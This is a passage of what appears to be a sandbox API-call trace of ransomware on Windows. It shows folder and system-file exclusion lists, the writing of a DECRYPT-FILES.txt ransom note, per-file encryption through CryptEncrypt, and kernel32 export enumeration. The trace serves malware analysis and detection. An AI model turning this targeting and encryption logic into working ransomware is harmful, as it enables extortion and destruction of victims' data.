HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Tor Browser\\") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\ProgramData\\") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\All Users") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\IETldCache\\") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\Local Settings\\") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="\\AppData\\Local") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="AhnLab") returned 0x0 [0082.185] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0082.185] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0082.185] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.185] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\\\jkbimi8.tmp") returned 108 [0082.185] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0082.186] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0082.186] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0082.186] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\\\DECRYPT-FILES.txt") returned 114 [0082.187] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0082.187] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0082.188] CloseHandle (hObject=0x464) returned 1 [0082.188] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0082.188] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*" [0082.188] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xad2e95e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad2e95e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0082.188] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.188] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb4f60210, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xad2e95e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad2e95e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.188] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.188] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.188] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad2e95e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad2e95e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad2e95e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0082.188] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0082.188] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad2e95e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad2e95e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad2e95e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0082.188] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0082.188] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0082.188] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0082.188] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0082.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0082.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0082.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0082.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0082.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0082.189] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0082.189] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.189] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0082.189] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0082.189] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0082.189] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0082.189] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0082.189] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0082.189] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0082.189] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\jkbimi8.tmp" [0082.189] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.189] CloseHandle (hObject=0x0) returned 0 [0082.189] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.190] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80cff0f0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80cff0f0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80cff0f0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2, dwReserved0=0x0, dwReserved1=0x0, cFileName="webapps.json", cAlternateFileName="WEBAPP~1.JSO")) returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="DECRYPT-FILES.txt") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="autorun.inf") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="boot.ini") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="desktop.ini") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="ntuser.dat") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="iconcache.db") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="bootsect.bak") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="ntuser.dat.log") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="thumbs.db") returned 1 [0082.190] lstrcmpiW (lpString1="webapps.json", lpString2="Bootfont.bin") returned 1 [0082.190] lstrlenW (lpString="webapps.json") returned 12 [0082.190] lstrcmpiW (lpString1="json", lpString2="lnk") returned -1 [0082.190] lstrcmpiW (lpString1="json", lpString2="exe") returned 1 [0082.190] lstrcmpiW (lpString1="json", lpString2="sys") returned -1 [0082.190] lstrcmpiW (lpString1="json", lpString2="dll") returned 1 [0082.190] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned 96 [0082.190] lstrlenW (lpString="webapps.json") returned 12 [0082.190] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\" [0082.190] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\", lpString2="webapps.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" [0082.190] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0082.191] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x3f2d200 | out: lpFileSize=0x3f2d200*=2) returned 1 [0082.191] CreateFileMappingW (hFile=0x468, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x46c [0082.191] MapViewOfFile (hFileMappingObject=0x46c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.191] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.191] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.191] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.192] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d168*=0x100) returned 1 [0082.193] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.193] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.193] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.193] CloseHandle (hObject=0x46c) returned 1 [0082.194] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.194] WriteFile (in: hFile=0x468, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d188, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d188*=0x108, lpOverlapped=0x0) returned 1 [0082.194] CloseHandle (hObject=0x0) returned 0 [0082.194] CloseHandle (hObject=0x468) returned 1 [0082.195] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.195] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.195] GetTickCount () returned 0x114d06a [0082.195] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.195] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.195] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.196] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.196] lstrlenA (lpString="kernel32.dll") returned 12 [0082.196] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.196] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.196] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.196] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.196] lstrlenA (lpString="ADDATOMA") returned 8 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.196] lstrlenA (lpString="ADDATOMW") returned 8 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.196] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.196] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.196] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.196] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.196] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.196] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.197] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.197] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.197] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.197] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.197] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.197] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.197] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.197] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.197] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.197] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.197] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.197] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.197] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.197] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.197] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.197] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.197] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.197] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.197] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.198] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.198] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.198] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.198] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.198] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.198] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.198] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.198] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.198] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.198] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.198] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.198] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.198] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.198] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.198] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.198] lstrcpyA (in: lpString1=0x3f2c580, 